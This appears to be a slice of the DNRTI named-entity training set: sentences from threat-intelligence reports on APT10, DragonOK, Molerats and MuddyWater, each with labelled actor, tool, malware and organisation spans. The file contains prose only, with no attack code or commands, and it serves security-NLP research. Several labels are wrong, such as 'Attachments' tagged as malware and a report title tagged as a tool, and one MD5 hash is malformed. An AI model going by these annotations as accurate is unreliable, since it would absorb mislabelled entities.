{"text": "APT10 achieves persistence on its targets primarily by using scheduled tasks or Windows services in order to ensure the malware remains active regardless of system reboots .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: scheduled tasks": [[61, 76]], "TOOL: Windows services": [[80, 96]]}, "info": {"id": "dnrti_train_000943", "source": "dnrti_train"}}
{"text": "For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators .", "spans": {"THREAT_ACTOR: threat actor": [[99, 111]]}, "info": {"id": "dnrti_train_000944", "source": "dnrti_train"}}
{"text": "In the majority of instances APT10 used either a reverse shell or RDP connection to install its malware ; the actor also uses these methods to propagate across the network .", "spans": {"THREAT_ACTOR: APT10": [[29, 34]], "TOOL: reverse shell": [[49, 62]], "TOOL: RDP": [[66, 69]], "THREAT_ACTOR: actor": [[110, 115]]}, "info": {"id": "dnrti_train_000945", "source": "dnrti_train"}}
{"text": "The tactical malware , historically EvilGrab , and now ChChes ( and likely also RedLeaves ) , is designed to be lightweight and disposable , often being delivered through spear phishing .", "spans": {"TOOL: EvilGrab": [[36, 44]], "TOOL: ChChes": [[55, 61]], "TOOL: RedLeaves": [[80, 89]]}, "info": {"id": "dnrti_train_000946", "source": "dnrti_train"}}
{"text": "Once executed , tactical malware contains the capability to profile the network and manoeuvre through it to identify a key system of interest .", "spans": {}, "info": {"id": "dnrti_train_000947", "source": "dnrti_train"}}
{"text": "We have also observed APT10 use DLL search order hijacking and sideloading , to execute some modified versions of open-source tools .", "spans": {"THREAT_ACTOR: APT10": [[22, 27]]}, "info": {"id": "dnrti_train_000948", "source": "dnrti_train"}}
{"text": "For example , PwC UK has observed APT10 compiling DLLs out of tools , such as Mimikatz and PwDump6 , and using legitimate , signed software , such as Windows Defender to load the malicious payloads .", "spans": {"ORGANIZATION: PwC UK": [[14, 20]], "THREAT_ACTOR: APT10": [[34, 39]], "TOOL: Mimikatz": [[78, 86]], "TOOL: PwDump6": [[91, 98]], "TOOL: signed software": [[124, 139]]}, "info": {"id": "dnrti_train_000949", "source": "dnrti_train"}}
{"text": "During our analysis of victim networks , we were able to observe APT10 once again initiate a retooling cycle in late 2016 .", "spans": {"THREAT_ACTOR: APT10": [[65, 70]]}, "info": {"id": "dnrti_train_000950", "source": "dnrti_train"}}
{"text": "We observed the deployment and testing of multiple versions of Quasar malware , and the introduction of the bespoke malware families ChChes and RedLeaves .", "spans": {"TOOL: Quasar malware": [[63, 77]], "TOOL: ChChes": [[133, 139]], "TOOL: RedLeaves": [[144, 153]]}, "info": {"id": "dnrti_train_000951", "source": "dnrti_train"}}
{"text": "APT10 is a constantly evolving , highly persistent China-based threat actor that has an ambitious and unprecedented collection programme against a broad spectrum of sectors , enabled by its strategic targeting .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "THREAT_ACTOR: threat actor": [[63, 75]]}, "info": {"id": "dnrti_train_000952", "source": "dnrti_train"}}
{"text": "Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns .", "spans": {"THREAT_ACTOR: APT10": [[43, 48]]}, "info": {"id": "dnrti_train_000953", "source": "dnrti_train"}}
{"text": "This operation has targeted managed IT service providers , the compromise of which provides APT10 with potential access to thousands of further victims .", "spans": {"ORGANIZATION: managed IT service providers": [[28, 56]], "THREAT_ACTOR: APT10": [[92, 97]]}, "info": {"id": "dnrti_train_000955", "source": "dnrti_train"}}
{"text": "An additional campaign has also been observed targeting Japanese entities .", "spans": {}, "info": {"id": "dnrti_train_000956", "source": "dnrti_train"}}
{"text": "APT10 's malware toolbox shows a clear evolution from malware commonly associated with China-based threat actors towards bespoke in-house malware that has been used in more recent campaigns ; this is indicative of APT10 's increasing sophistication , which is highly likely to continue .", "spans": {"THREAT_ACTOR: APT10": [[0, 5], [214, 219]], "THREAT_ACTOR: threat actors": [[99, 112]]}, "info": {"id": "dnrti_train_000957", "source": "dnrti_train"}}
{"text": "The threat actor 's known working hours align to Chinese Standard Time ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16]], "THREAT_ACTOR: threat actors": [[144, 157]], "THREAT_ACTOR: APT10": [[228, 233]]}, "info": {"id": "dnrti_train_000958", "source": "dnrti_train"}}
{"text": "APT10 ( MenuPass Group ) is a Chinese cyber espionage group that FireEye has tracked since 2009 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "THREAT_ACTOR: MenuPass Group": [[8, 22]], "THREAT_ACTOR: cyber espionage group": [[38, 59]], "ORGANIZATION: FireEye": [[65, 72]]}, "info": {"id": "dnrti_train_000959", "source": "dnrti_train"}}
{"text": "Its targets include the military organizations and governments of countries with national interests in the South China Sea , including some within the U.S. defense industrial base .", "spans": {"ORGANIZATION: military organizations": [[24, 46]], "ORGANIZATION: defense industrial base": [[156, 179]]}, "info": {"id": "dnrti_train_000960", "source": "dnrti_train"}}
{"text": "Moafee may have chosen its targets based on the rich resources of South China Sea region – the world 's second business sea-lane , according to Wikipedia – including rare earth metals , crude oil , and natural gas .", "spans": {"THREAT_ACTOR: Moafee": [[0, 6]]}, "info": {"id": "dnrti_train_000961", "source": "dnrti_train"}}
{"text": "DragonOK appears to operate out of China 's Jiangsu Province .", "spans": {"THREAT_ACTOR: DragonOK": [[0, 8]]}, "info": {"id": "dnrti_train_000962", "source": "dnrti_train"}}
{"text": "Moafee and DragonOK both use a well-known proxy tool – HUC Packet Transmit Tool ( HTRAN ) – to disguise their geographical locations .", "spans": {"THREAT_ACTOR: Moafee": [[0, 6]], "THREAT_ACTOR: DragonOK": [[11, 19]], "TOOL: HUC Packet Transmit Tool": [[55, 79]], "TOOL: HTRAN": [[82, 87]]}, "info": {"id": "dnrti_train_000963", "source": "dnrti_train"}}
{"text": "However , FireEye researchers do not have enough insight to reliably report a definitive connection to the Moafee and DragonOK groups .", "spans": {"ORGANIZATION: FireEye": [[10, 17]], "THREAT_ACTOR: Moafee": [[107, 113]], "THREAT_ACTOR: DragonOK groups": [[118, 133]]}, "info": {"id": "dnrti_train_000964", "source": "dnrti_train"}}
{"text": "Both Moafee and DragonOK favor spear-phishing emails as an attack vector , often employing a decoy to deceive the victim .", "spans": {"THREAT_ACTOR: Moafee": [[5, 11]], "THREAT_ACTOR: DragonOK": [[16, 24]]}, "info": {"id": "dnrti_train_000965", "source": "dnrti_train"}}
{"text": "Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document .", "spans": {"MALWARE: Attachments": [[0, 11]]}, "info": {"id": "dnrti_train_000966", "source": "dnrti_train"}}
{"text": "We observed Moafee running HTRAN proxies on their multiple Command and Control ( C2 ) servers – all operated on CHINANET , and hosted in Guangdong Province .", "spans": {"THREAT_ACTOR: Moafee": [[12, 18]], "TOOL: HTRAN": [[27, 32]]}, "info": {"id": "dnrti_train_000967", "source": "dnrti_train"}}
{"text": "Like the Moafee group , we observed DragonOK running HTRAN to proxy their C2 servers , which are also operated on CHINANET but are hosted in the Jiangsu Province .", "spans": {"THREAT_ACTOR: Moafee group": [[9, 21]], "THREAT_ACTOR: DragonOK": [[36, 44]], "TOOL: HTRAN": [[53, 58]]}, "info": {"id": "dnrti_train_000968", "source": "dnrti_train"}}
{"text": "Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources .", "spans": {"THREAT_ACTOR: Moafee": [[110, 116]]}, "info": {"id": "dnrti_train_000969", "source": "dnrti_train"}}
{"text": "Security researchers subsequently linked these attacks to a broader , yearlong campaign that targeted not just Israelis but Palestinians as well .", "spans": {}, "info": {"id": "dnrti_train_000971", "source": "dnrti_train"}}
{"text": "and as discovered later , even the U.S. and UK governments .", "spans": {}, "info": {"id": "dnrti_train_000972", "source": "dnrti_train"}}
{"text": "The second group , known as DragonOK , targets high-tech and manufacturing companies in Japan and Taiwan .", "spans": {"THREAT_ACTOR: group": [[11, 16]], "THREAT_ACTOR: DragonOK": [[28, 36]], "ORGANIZATION: high-tech": [[47, 56]], "ORGANIZATION: manufacturing companies": [[61, 84]]}, "info": {"id": "dnrti_train_000973", "source": "dnrti_train"}}
{"text": "In 2012 , the Molerats attacks appeared to rely heavily on the XtremeRAT , a freely available tool that is popular with attackers based in the Middle East .", "spans": {"TOOL: XtremeRAT": [[63, 72]], "THREAT_ACTOR: attackers": [[120, 129]]}, "info": {"id": "dnrti_train_000974", "source": "dnrti_train"}}
{"text": "But the group has also used Poison Ivy ( PIVY ) , a RAT more commonly associated with threat actors in China — so much so that PIVY has , inaccurately , become synonymous with all APT attacks linked to China .", "spans": {"THREAT_ACTOR: group": [[8, 13]], "TOOL: Poison Ivy": [[28, 38]], "TOOL: PIVY": [[41, 45], [127, 131]], "TOOL: RAT": [[52, 55]], "THREAT_ACTOR: threat actors": [[86, 99]]}, "info": {"id": "dnrti_train_000975", "source": "dnrti_train"}}
{"text": "This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files .", "spans": {"TOOL: PIVY": [[70, 74]], "MALWARE: malicious files": [[298, 313]]}, "info": {"id": "dnrti_train_000976", "source": "dnrti_train"}}
{"text": "We do not know whether using PIVY is an attempt by those behind the Molerats campaign to frame China-based threat actors for their attacks or simply evidence that they have added another effective , publicly-available RAT to its arsenal .", "spans": {"TOOL: PIVY": [[29, 33]], "THREAT_ACTOR: threat actors": [[107, 120]], "TOOL: RAT": [[218, 221]]}, "info": {"id": "dnrti_train_000977", "source": "dnrti_train"}}
{"text": "We observed several attacks in June and July 2013 against targets in the Middle East and the U.S. that dropped a PIVY payload that connected to command-and-control ( CnC ) infrastructure used by the Molerats attackers .", "spans": {"TOOL: PIVY": [[113, 117]], "TOOL: command-and-control": [[144, 163]], "TOOL: CnC": [[166, 169]], "THREAT_ACTOR: Molerats": [[199, 207]], "THREAT_ACTOR: attackers": [[208, 217]]}, "info": {"id": "dnrti_train_000978", "source": "dnrti_train"}}
{"text": "The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": {"MALWARE: .exe file": [[24, 33]], "MALWARE: Microsoft Word file": [[61, 80]]}, "info": {"id": "dnrti_train_000979", "source": "dnrti_train"}}
{"text": "In addition to DustySky , the attackers use publicly available tools such as the following Remote Administration Tools ( RAT ) : Poison Ivy , Nano Core , XtremeRAT , DarkComet and Spy-Net .", "spans": {"TOOL: DustySky": [[15, 23]], "THREAT_ACTOR: attackers": [[30, 39]], "TOOL: publicly available tools": [[44, 68]], "TOOL: Remote Administration Tools": [[91, 118]], "TOOL: RAT": [[121, 124]], "TOOL: Poison Ivy": [[129, 139]], "TOOL: Nano Core": [[142, 151]], "TOOL: XtremeRAT": [[154, 163]], "TOOL: DarkComet": [[166, 175]], "TOOL: Spy-Net": [[180, 187]]}, "info": {"id": "dnrti_train_000980", "source": "dnrti_train"}}
{"text": "DustySky ( called \" NeD Worm \" by its developer ) is a multi-stage malware in use since May 2015 .", "spans": {"TOOL: DustySky": [[0, 8]]}, "info": {"id": "dnrti_train_000981", "source": "dnrti_train"}}
{"text": "It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering .", "spans": {"THREAT_ACTOR: Molerats": [[20, 28]], "THREAT_ACTOR: Gaza cybergang": [[35, 49]], "THREAT_ACTOR: group": [[78, 83]]}, "info": {"id": "dnrti_train_000982", "source": "dnrti_train"}}
{"text": "Operating since 2012 , the Molerats group 's activity has been reported by Norman , Kaspersky , FireEye , and PwC .", "spans": {"THREAT_ACTOR: Molerats group": [[27, 41]], "ORGANIZATION: Norman": [[75, 81]], "ORGANIZATION: Kaspersky": [[84, 93]], "ORGANIZATION: FireEye": [[96, 103]], "ORGANIZATION: PwC": [[110, 113]]}, "info": {"id": "dnrti_train_000983", "source": "dnrti_train"}}
{"text": "DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering .", "spans": {"TOOL: DustySky": [[0, 8]], "THREAT_ACTOR: Molerats": [[55, 63]], "THREAT_ACTOR: Gaza cybergang": [[72, 86]], "THREAT_ACTOR: terrorist group": [[95, 110]]}, "info": {"id": "dnrti_train_000984", "source": "dnrti_train"}}
{"text": "Most targets are from the Middle East : Israel , Egypt , Saudi Arabia , United Arab Emirates and Iraq .", "spans": {}, "info": {"id": "dnrti_train_000985", "source": "dnrti_train"}}
{"text": "The United States and countries in Europe are targeted as well .", "spans": {}, "info": {"id": "dnrti_train_000986", "source": "dnrti_train"}}
{"text": "The sample analyzed is f589827c4cf94662544066b80bfda6ab from late August 2015 .", "spans": {}, "info": {"id": "dnrti_train_000987", "source": "dnrti_train"}}
{"text": "The MuddyWater attacks are primarily against Middle Eastern nations .", "spans": {}, "info": {"id": "dnrti_train_000988", "source": "dnrti_train"}}
{"text": "However , we have also observed attacks against surrounding nations and beyond , including targets in India and the USA .", "spans": {}, "info": {"id": "dnrti_train_000989", "source": "dnrti_train"}}
{"text": "The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes .", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[4, 30]], "MALWARE: malicious files": [[78, 93]], "ORGANIZATION: MalwareBytes": [[194, 206]]}, "info": {"id": "dnrti_train_000991", "source": "dnrti_train"}}
{"text": "MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call \" POWERSTATS \" .", "spans": {"TOOL: PowerShell-based first stage backdoor": [[69, 106]], "TOOL: POWERSTATS": [[117, 127]]}, "info": {"id": "dnrti_train_000992", "source": "dnrti_train"}}
{"text": "When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East , we were somewhat confused as the previous public reporting had attributed these attacks to FIN7 .", "spans": {"THREAT_ACTOR: FIN7": [[219, 223]]}, "info": {"id": "dnrti_train_000993", "source": "dnrti_train"}}
{"text": "Following the trail of existing public reporting , the tie to FIN7 is essentially made based on a download observed from a MuddyWater C2 , of a non-public tool \" DNSMessenger \" .", "spans": {"THREAT_ACTOR: FIN7": [[62, 66]], "TOOL: MuddyWater C2": [[123, 136]], "TOOL: non-public tool": [[144, 159]], "TOOL: DNSMessenger": [[162, 174]]}, "info": {"id": "dnrti_train_000995", "source": "dnrti_train"}}
{"text": "There was a mistake in the original Morphisec analysis which linked these attacks to FIN7 .", "spans": {"ORGANIZATION: Morphisec": [[36, 45]], "THREAT_ACTOR: FIN7": [[85, 89]]}, "info": {"id": "dnrti_train_000996", "source": "dnrti_train"}}
{"text": "The DNSMessenger malware is a shared tool , used by FIN7 , MuddyWater and perhaps other groups .", "spans": {"TOOL: DNSMessenger malware": [[4, 24]], "THREAT_ACTOR: FIN7": [[52, 56]], "THREAT_ACTOR: MuddyWater": [[59, 69]], "THREAT_ACTOR: groups": [[88, 94]]}, "info": {"id": "dnrti_train_000997", "source": "dnrti_train"}}
{"text": "In September 2018 , we found evidence of Seedworm and the espionage group APT28 ( aka Swallowtail , Fancy Bear ) , on a computer within the Brazil-based embassy of an oil-producing nation .", "spans": {"THREAT_ACTOR: Seedworm": [[41, 49]], "THREAT_ACTOR: espionage group": [[58, 73]], "THREAT_ACTOR: APT28": [[74, 79]], "THREAT_ACTOR: Swallowtail": [[86, 97]], "THREAT_ACTOR: Fancy Bear": [[100, 110]], "ORGANIZATION: embassy": [[153, 160]]}, "info": {"id": "dnrti_train_000998", "source": "dnrti_train"}}
{"text": "We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded .", "spans": {"TOOL: Powermud backdoor": [[29, 46]], "MALWARE: Backdoor.Powemuddy": [[66, 84]], "TOOL: custom tools": [[93, 105]], "MALWARE: makecab.exe": [[238, 249]]}, "info": {"id": "dnrti_train_000999", "source": "dnrti_train"}}
{"text": "Seedworm likely functions as a cyber espionage group to secure actionable intelligence that could benefit their sponsor 's interests .", "spans": {"THREAT_ACTOR: Seedworm": [[0, 8]], "THREAT_ACTOR: cyber espionage group": [[31, 52]]}, "info": {"id": "dnrti_train_001000", "source": "dnrti_train"}}
{"text": "During the operations , the group used tools consistent with those leveraged during past intrusions including Powermud , a custom tool used by the Seedworm group , and customized PowerShell , LaZagne , and Crackmapexec scripts .", "spans": {"THREAT_ACTOR: group": [[28, 33]], "TOOL: Powermud": [[110, 118]], "THREAT_ACTOR: Seedworm group": [[147, 161]], "TOOL: customized PowerShell": [[168, 189]], "TOOL: LaZagne": [[192, 199]], "TOOL: Crackmapexec scripts": [[206, 226]]}, "info": {"id": "dnrti_train_001001", "source": "dnrti_train"}}
{"text": "The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control ( C&C ) location .", "spans": {"THREAT_ACTOR: Seedworm group": [[4, 18]], "TOOL: Powermud backdoor": [[32, 49]], "TOOL: command-and-control": [[99, 118]]}, "info": {"id": "dnrti_train_001002", "source": "dnrti_train"}}
{"text": "After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals .", "spans": {"TOOL: Powermud": [[54, 62]], "TOOL: Powemuddy": [[66, 75]], "THREAT_ACTOR: Seedworm": [[78, 86]]}, "info": {"id": "dnrti_train_001003", "source": "dnrti_train"}}
{"text": "Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials .", "spans": {"THREAT_ACTOR: Seedworm": [[0, 8]], "TOOL: LaZagne": [[45, 52]], "TOOL: Crackmapexec": [[57, 69]]}, "info": {"id": "dnrti_train_001004", "source": "dnrti_train"}}
{"text": "The group , which we call Seedworm ( aka MuddyWater ) , has been operating since at least 2017 , with its most recent activity observed in December 2018 .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: Seedworm": [[26, 34]], "THREAT_ACTOR: MuddyWater": [[41, 51]]}, "info": {"id": "dnrti_train_001005", "source": "dnrti_train"}}
{"text": "The Seedworm group is the only group known to use the Powermud backdoor .", "spans": {"THREAT_ACTOR: Seedworm group": [[4, 18]], "THREAT_ACTOR: group": [[31, 36]], "TOOL: Powermud backdoor": [[54, 71]]}, "info": {"id": "dnrti_train_001006", "source": "dnrti_train"}}
{"text": "Additionally , the group compromised organizations in Europe and North America that have ties to the Middle East .", "spans": {"THREAT_ACTOR: group": [[19, 24]]}, "info": {"id": "dnrti_train_001007", "source": "dnrti_train"}}
{"text": "MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "THREAT_ACTOR: threat actor": [[38, 50]]}, "info": {"id": "dnrti_train_001008", "source": "dnrti_train"}}
{"text": "Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link .", "spans": {"TOOL: DNSMessenger": [[67, 79]], "TOOL: MuddyWater": [[84, 94]]}, "info": {"id": "dnrti_train_001009", "source": "dnrti_train"}}
{"text": "Depending on each sample , the content of document is either a fake resume application , or a letter from the Ministry of Justice in Lebanon or Saudi Arabia .", "spans": {"TOOL: fake resume application": [[63, 86]], "TOOL: letter": [[94, 100]]}, "info": {"id": "dnrti_train_001012", "source": "dnrti_train"}}
{"text": "Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": {"ORGANIZATION: DeepSight Managed Adversary and Threat Intelligence": [[16, 67]], "ORGANIZATION: MATI": [[70, 74]], "MALWARE: Backdoor.Powemuddy": [[110, 128]], "THREAT_ACTOR: Seedworm": [[147, 155]], "MALWARE: Powermud backdoor": [[159, 176]], "TOOL: POWERSTATS": [[183, 193]], "THREAT_ACTOR: group": [[230, 235], [306, 311]]}, "info": {"id": "dnrti_train_001013", "source": "dnrti_train"}}
{"text": "From January 2018 to March 2018 , through FireEye 's Dynamic Threat Intelligence , we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East .", "spans": {"ORGANIZATION: FireEye 's Dynamic Threat Intelligence": [[42, 80]], "THREAT_ACTOR: attackers": [[95, 104]]}, "info": {"id": "dnrti_train_001014", "source": "dnrti_train"}}
{"text": "MuddyWater has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "ORGANIZATION: defense entities": [[68, 84]]}, "info": {"id": "dnrti_train_001015", "source": "dnrti_train"}}
{"text": "This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia .", "spans": {"THREAT_ACTOR: actor": [[5, 10]], "ORGANIZATION: defense entities": [[68, 84]]}, "info": {"id": "dnrti_train_001016", "source": "dnrti_train"}}
{"text": "When successfully executed , the malicious documents install a backdoor we track as POWERSTATS .", "spans": {"TOOL: backdoor": [[63, 71]], "TOOL: POWERSTATS": [[84, 94]]}, "info": {"id": "dnrti_train_001017", "source": "dnrti_train"}}
{"text": "The group is known for espionage campaigns in the Middle East .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_001018", "source": "dnrti_train"}}
{"text": "The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques .", "spans": {"THREAT_ACTOR: threat group": [[4, 16]]}, "info": {"id": "dnrti_train_001019", "source": "dnrti_train"}}
{"text": "The MuddyWater campaign was first sighted in 2017 when it targeted the Saudi government using an attack involving PowerShell scripts deployed via Microsoft Office Word macro .", "spans": {"TOOL: PowerShell scripts": [[114, 132]], "TOOL: Microsoft": [[146, 155]], "TOOL: Office Word": [[156, 167]]}, "info": {"id": "dnrti_train_001020", "source": "dnrti_train"}}
{"text": "The threat group in this recently observed campaign a TEMP.Zagros a weaponized their malware using the following techniques .", "spans": {"THREAT_ACTOR: threat group": [[4, 16]]}, "info": {"id": "dnrti_train_001021", "source": "dnrti_train"}}
{"text": "Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload .", "spans": {"MALWARE: Microsoft Word document": [[60, 83]]}, "info": {"id": "dnrti_train_001022", "source": "dnrti_train"}}
{"text": "MuddyWater is a relatively new APT that surfaced in 2017 .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]], "THREAT_ACTOR: APT": [[31, 34]]}, "info": {"id": "dnrti_train_001023", "source": "dnrti_train"}}
{"text": "We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro as MuddyWater ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": {"THREAT_ACTOR: TEMP.Zagros": [[30, 41]], "ORGANIZATION: Palo Alto Networks": [[56, 74]], "ORGANIZATION: Trend Micro": [[79, 90]], "THREAT_ACTOR: MuddyWater": [[94, 104]], "THREAT_ACTOR: actor": [[123, 128]]}, "info": {"id": "dnrti_train_001024", "source": "dnrti_train"}}
{"text": "We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": {"THREAT_ACTOR: TEMP.Zagros": [[30, 41]], "ORGANIZATION: Palo Alto Networks": [[56, 74]], "ORGANIZATION: Trend Micro": [[79, 90]], "THREAT_ACTOR: actor": [[109, 114]]}, "info": {"id": "dnrti_train_001025", "source": "dnrti_train"}}
{"text": "Entities in these sectors are often \" enabling victims \" as telecommunications providers or IT services agencies and vendors could provide Seedworm actors with further victims to compromise .", "spans": {"ORGANIZATION: telecommunications providers": [[60, 88]], "ORGANIZATION: IT services agencies": [[92, 112]], "THREAT_ACTOR: Seedworm actors": [[139, 154]]}, "info": {"id": "dnrti_train_001026", "source": "dnrti_train"}}
{"text": "The group mainly targets the telecommunications and IT services sectors .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: telecommunications": [[29, 47]], "ORGANIZATION: IT services sectors": [[52, 71]]}, "info": {"id": "dnrti_train_001027", "source": "dnrti_train"}}
{"text": "However , the group behind MuddyWater has been known to target other countries in the Middle East , Europe and the US .", "spans": {"THREAT_ACTOR: group": [[14, 19]], "THREAT_ACTOR: MuddyWater": [[27, 37]]}, "info": {"id": "dnrti_train_001028", "source": "dnrti_train"}}
{"text": "MuddyWater has recently been targeting victims likely from Lebanon and Oman , while leveraging compromised domains , one of which is owned by an Israeli web developer .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]]}, "info": {"id": "dnrti_train_001031", "source": "dnrti_train"}}
{"text": "As MuddyWater has consistently been using POWERSTATS as its main tool , they are relatively easy to distinguish from other actors .", "spans": {"THREAT_ACTOR: MuddyWater": [[3, 13]], "TOOL: POWERSTATS": [[42, 52]], "THREAT_ACTOR: actors": [[123, 129]]}, "info": {"id": "dnrti_train_001032", "source": "dnrti_train"}}
{"text": "In March 2018 , Trend Micro provided a detailed analysis of another campaign that bore the hallmarks of MuddyWater .", "spans": {"ORGANIZATION: Trend Micro": [[16, 27]], "THREAT_ACTOR: MuddyWater": [[104, 114]]}, "info": {"id": "dnrti_train_001033", "source": "dnrti_train"}}
{"text": "In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": {"ORGANIZATION: Trend Micro": [[14, 25]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[59, 78]]}, "info": {"id": "dnrti_train_001034", "source": "dnrti_train"}}
{"text": "We recently noticed the group behind MuddyWater that appear to be targeting government bodies , military entities , telcos and educational institutions in Jordan , Turkey , Azerbaijan and Pakistan , in addition to the continuous targeting of Iraq and Saudi Arabia , other victims were also detected in Mali , Austria , Russia , Iran and Bahrain. .", "spans": {"THREAT_ACTOR: group": [[24, 29]], "THREAT_ACTOR: MuddyWater": [[37, 47]], "ORGANIZATION: government bodies": [[76, 93]], "ORGANIZATION: military entities": [[96, 113]], "ORGANIZATION: educational institutions": [[127, 151]]}, "info": {"id": "dnrti_train_001037", "source": "dnrti_train"}}
{"text": "Observed Seedworm victims were located primarily in Pakistan and Turkey , but also in Russia , Saudi Arabia , Afghanistan , Jordan , and elsewhere .", "spans": {"THREAT_ACTOR: Seedworm": [[9, 17]]}, "info": {"id": "dnrti_train_001038", "source": "dnrti_train"}}
{"text": "The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering , in addition to the active development of attacks , infrastructure and the use of new methods and techniques .", "spans": {"THREAT_ACTOR: MuddyWaters group": [[4, 21]]}, "info": {"id": "dnrti_train_001039", "source": "dnrti_train"}}
{"text": "Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \" BlackWater \" is associated with suspected persistent threat actor MuddyWater .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]], "THREAT_ACTOR: threat actor MuddyWater": [[147, 170]]}, "info": {"id": "dnrti_train_001040", "source": "dnrti_train"}}
{"text": "In this latest activity , BlackWater first added an obfuscated Visual Basic for Applications ( VBA ) script to establish persistence as a registry key .", "spans": {"TOOL: Visual Basic for Applications": [[63, 92]], "TOOL: VBA": [[95, 98]]}, "info": {"id": "dnrti_train_001041", "source": "dnrti_train"}}
{"text": "Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: threat actor MuddyWater": [[111, 134]]}, "info": {"id": "dnrti_train_001042", "source": "dnrti_train"}}
{"text": "MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East .", "spans": {"THREAT_ACTOR: MuddyWater": [[0, 10]]}, "info": {"id": "dnrti_train_001043", "source": "dnrti_train"}}
{"text": "Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) .", "spans": {"TOOL: MuddyWater-associated samples": [[43, 72]], "TOOL: PowerShell commands": [[157, 176]], "THREAT_ACTOR: actor": [[248, 253]]}, "info": {"id": "dnrti_train_001044", "source": "dnrti_train"}}
{"text": "Despite last month 's report on aspects of the MuddyWater campaign , the group is undeterred and continues to perform operations .", "spans": {"THREAT_ACTOR: group": [[73, 78]]}, "info": {"id": "dnrti_train_001045", "source": "dnrti_train"}}
{"text": "Based on these observations , as well as MuddyWater 's history of targeting Turkey-based entities , we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group .", "spans": {"THREAT_ACTOR: MuddyWater": [[41, 51], [177, 187]], "THREAT_ACTOR: threat actor group": [[188, 206]]}, "info": {"id": "dnrti_train_001046", "source": "dnrti_train"}}
{"text": "Our recent report , \" The Chronicles of the Hellsing APT : the Empire Strikes Back \" began with an introduction to the Naikon APT , describing it as \" One of the most active APTs in Asia , especially around the South China Sea \" .", "spans": {"THREAT_ACTOR: Hellsing APT": [[44, 56]], "TOOL: Empire Strikes Back": [[63, 82]], "THREAT_ACTOR: Naikon APT": [[119, 129]]}, "info": {"id": "dnrti_train_001047", "source": "dnrti_train"}}
{"text": "It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 .", "spans": {"TOOL: Tran Duy Linh": [[27, 40]], "VULNERABILITY: CVE-2012-0158": [[43, 56]]}, "info": {"id": "dnrti_train_001048", "source": "dnrti_train"}}
